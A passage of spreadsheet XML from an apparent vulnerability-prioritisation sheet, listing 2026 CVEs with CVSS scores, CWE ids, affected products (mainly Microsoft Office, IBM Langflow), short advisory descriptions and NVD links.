          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78505</t>
        </is>
      </c>
      <c r="C981" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E981" s="5" t="inlineStr"/>
      <c r="F981" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G981" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H981" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I981" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L981" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78507</t>
        </is>
      </c>
      <c r="C982" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E982" s="5" t="inlineStr"/>
      <c r="F982" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G982" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H982" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L982" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78511</t>
        </is>
      </c>
      <c r="C983" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E983" s="5" t="inlineStr"/>
      <c r="F983" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G983" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H983" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L983" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78512</t>
        </is>
      </c>
      <c r="C984" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E984" s="5" t="inlineStr"/>
      <c r="F984" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G984" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H984" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I984" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L984" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t>
        </is>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78514</t>
        </is>
      </c>
      <c r="C985" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E985" s="5" t="inlineStr"/>
      <c r="F985" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G985" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H985" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J985" s="5" t="inlineStr"/>
      <c r="K985" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L985" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t>
        </is>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78517</t>
        </is>
      </c>
      <c r="C986" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E986" s="5" t="inlineStr"/>
      <c r="F986" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G986" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H986" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J986" s="5" t="inlineStr"/>
      <c r="K986" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L986" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t>
        </is>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78518</t>
        </is>
      </c>
      <c r="C987" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E987" s="5" t="inlineStr"/>
      <c r="F987" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G987" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H987" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J987" s="5" t="inlineStr"/>
      <c r="K987" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="L987" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t>
        </is>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78519</t>
        </is>
      </c>
      <c r="C988" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E988" s="5" t="inlineStr"/>
      <c r="F988" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G988" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H988" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="I988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J988" s="5" t="inlineStr"/>
      <c r="K988" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L988" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t>
        </is>
      </c>
    </row>
    <row r="989">
      <c r="A989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78521</t>
        </is>
      </c>
      <c r="C989" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E989" s="5" t="inlineStr"/>
      <c r="F989" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G989" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H989" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I989" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J989" s="5" t="inlineStr"/>
      <c r="K989" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L989" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t>
        </is>
      </c>
    </row>
    <row r="990">
      <c r="A990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78524</t>
        </is>
      </c>
      <c r="C990" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E990" s="5" t="inlineStr"/>
      <c r="F990" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G990" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H990" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I990" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J990" s="5" t="inlineStr"/>
      <c r="K990" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L990" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t>
        </is>
      </c>
    </row>
    <row r="991">
      <c r="A991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78525</t>
        </is>
      </c>
      <c r="C991" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E991" s="5" t="inlineStr"/>
      <c r="F991" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G991" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H991" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="I991" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J991" s="5" t="inlineStr"/>
      <c r="K991" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L991" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t>
        </is>
      </c>
    </row>
    <row r="992">
      <c r="A992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78526</t>
        </is>
      </c>
      <c r="C992" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E992" s="5" t="inlineStr"/>
      <c r="F992" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G992" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H992" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J992" s="5" t="inlineStr"/>
      <c r="K992" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L992" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t>
        </is>
      </c>
    </row>
    <row r="993">
      <c r="A993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78569</t>
        </is>
      </c>
      <c r="C993" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E993" s="5" t="inlineStr"/>
      <c r="F993" s="5" t="inlineStr"/>
      <c r="G993" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H993" s="5" t="inlineStr"/>
      <c r="I993" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J993" s="5" t="inlineStr"/>
      <c r="K993" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L993" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow an authenticated attacker to execute arbitrary code due to an incomplete denylist in the security scanner.</t>
        </is>
      </c>
      <c r="M993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78569</t>
        </is>
      </c>
    </row>
    <row r="994">
      <c r="A994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78571</t>
        </is>
      </c>
      <c r="C994" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E994" s="5" t="inlineStr"/>
      <c r="F994" s="5" t="inlineStr"/>
      <c r="G994" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H994" s="5" t="inlineStr"/>
      <c r="I994" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J994" s="5" t="inlineStr"/>
      <c r="K994" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L994" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an unguarded eval() call on attacker-controlled input.</t>
        </is>
      </c>
      <c r="M994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78571</t>
        </is>
      </c>
    </row>
    <row r="995">
      <c r="A995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78575</t>
        </is>
      </c>
      <c r="C995" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E995" s="5" t="inlineStr"/>
      <c r="F995" s="5" t="inlineStr"/>
      <c r="G995" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H995" s="5" t="inlineStr"/>
      <c r="I995" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J995" s="5" t="inlineStr"/>
      <c r="K995" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L995" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary commands due to improper validation of command-line arguments in the MCP stdio server configuration.</t>
        </is>
      </c>
      <c r="M995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78575</t>
        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78834</t>
        </is>
      </c>
      <c r="C996" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E996" s="5" t="inlineStr"/>
      <c r="F996" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="inlineStr"/>
      <c r="I996" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L996" s="5" t="inlineStr">
        <is>
          <t>A code execution vulnerability exists in CMSimple 5.22 in the CoAuthors plugin. An authenticated low-privileged user who can modify page content and provide controlled imported content can trigger server-side execution by referencing crafted external or uploaded text content through the affected content import feature.</t>
        </is>
      </c>
      <c r="M996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79376</t>
        </is>
      </c>
      <c r="C997" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E997" s="5" t="inlineStr"/>
      <c r="F997" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="inlineStr"/>
      <c r="I997" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr">
        <is>
          <t>CWE-1284, CWE-20</t>
        </is>
      </c>
      <c r="L997" s="5" t="inlineStr">
        <is>
          <t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t>
        </is>
      </c>
      <c r="M997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79423</t>
        </is>
      </c>
      <c r="C998" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E998" s="5" t="inlineStr"/>
      <c r="F998" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="inlineStr"/>
      <c r="I998" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L998" s="5" t="inlineStr">
        <is>
          <t>An authenticated remote code execution (RCE) vulnerability in the admin_config.php component of seacms v13.6 allows attackers to execute arbitrary code via a crafted POST request.</t>
        </is>
      </c>
      <c r="M998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79423</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79602</t>
        </is>
      </c>
      <c r="C999" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D999" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E999" s="5" t="inlineStr"/>
      <c r="F999" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="inlineStr"/>
      <c r="I999" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="L999" s="5" t="inlineStr">
        <is>
          <t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t>
        </is>
      </c>
      <c r="M999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79742</t>
        </is>
      </c>
      <c r="C1000" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1000" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1000" s="5" t="inlineStr"/>
      <c r="F1000" s="5" t="inlineStr"/>
      <c r="G1000" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1000" s="5" t="inlineStr"/>
      <c r="I1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1000" s="5" t="inlineStr"/>
      <c r="K1000" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1000" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute arbitrary code due to an incomplete environment variable blocklist.</t>
        </is>
      </c>
      <c r="M1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79742</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79744</t>
        </is>
      </c>
      <c r="C1001" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1001" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1001" s="5" t="inlineStr"/>
      <c r="F1001" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="inlineStr"/>
      <c r="I1001" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1001" s="5" t="inlineStr"/>
      <c r="K1001" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="L1001" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.29, MCPHub's PUT /api/system-config endpoint (handler updateSystemConfig) performs no authorization check. It is protected only by the app-wide authentication middleware and a rate limiter — it never inspects req.user.isAdmin. This issue has been patched in version 1.0.29.</t>
        </is>
      </c>
      <c r="M1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79744</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80074</t>
        </is>
      </c>
      <c r="C1002" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1002" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1002" s="5" t="inlineStr"/>
      <c r="F1002" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="inlineStr"/>
      <c r="I1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1002" s="5" t="inlineStr"/>
      <c r="K1002" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1002" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80077</t>
        </is>
      </c>
      <c r="C1003" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1003" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1003" s="5" t="inlineStr"/>
      <c r="F1003" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="inlineStr"/>
      <c r="I1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1003" s="5" t="inlineStr"/>
      <c r="K1003" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
